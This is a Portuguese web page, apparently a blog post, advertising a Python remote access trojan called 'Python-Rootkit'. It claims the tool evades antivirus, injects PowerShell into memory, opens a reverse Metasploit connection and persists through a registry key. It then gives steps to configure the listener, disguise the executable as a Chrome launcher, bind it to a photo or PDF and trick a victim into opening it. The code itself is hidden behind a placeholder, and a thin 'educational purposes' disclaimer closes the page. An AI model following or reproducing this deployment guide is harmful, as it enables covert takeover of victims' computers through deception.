Browse By

Python (RAT) – Python-Rootkit

Python (RAT)

 

Este é um RAT python indetectável completo que pode ignorar quase todos os antivírus e abrir uma porta traseira dentro de qualquer máquina do Windows , que estabelecerá uma conexão inversa https Metasploit para sua máquina de escuta.

 

ViRu5 ciclo de vida
  • Ignore todos os antivírus.
  • Injetar um malicioso PowerShell script em memória.
  • Estabeleça uma conexão https reversa para a máquina atacante.
  • Verifique a cada 10 segundos e verifique se a conexão ainda existe. Se não, ele irá restabelecer uma nova conexão.
  • Adicione uma chave de registro de inicialização para reconectar-se ao atacante após a reinicialização.
Passos
  • Atualize os parâmetros viRu5 / source.py com seu lhost e lport
  • Altere o nome da fonte.py para GoogleChromeAutoLaunch.py
  • Adicione GoogleChromeAutoLaunch.py, setup.py e seu ícone como icon.ico para c: \ python27 dir
  • Do cmd do
    cd c: \ python27
    python setup.py py2exe
    
    
  • Encontre o arquivo rer exe no Dist dir.
  • Aperte-o com qualquer foto, pdf, palavra ou qualquer tipo de arquivos
  • Envie para a vítima
  • Use suas habilidades de engenheiro social para fazê-lo abrir o arquivo
  • Você receberá uma conexão inversa https metasoplit 🙂
Testando em
  • Windows 7 32bit
  • Windows 7 64bit
  • Windows 8 32bit
  • Windows 8 64bit
  • Windows 8.1 32bit
  • Windows 8.1 64 bit
  • Windows 10 32bit
  • Windows 10 64bit
aviso Legal
Isso é apenas para propósitos educacionais. Em primeiro lugar, este código visa alertar as pessoas sobre problemas de segurança, máquinas infectadas não pisadas.

 

[sociallocker id=”2259″]

[/sociallocker]

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Este site utiliza o Akismet para reduzir spam. Fica a saber como são processados os dados dos comentários.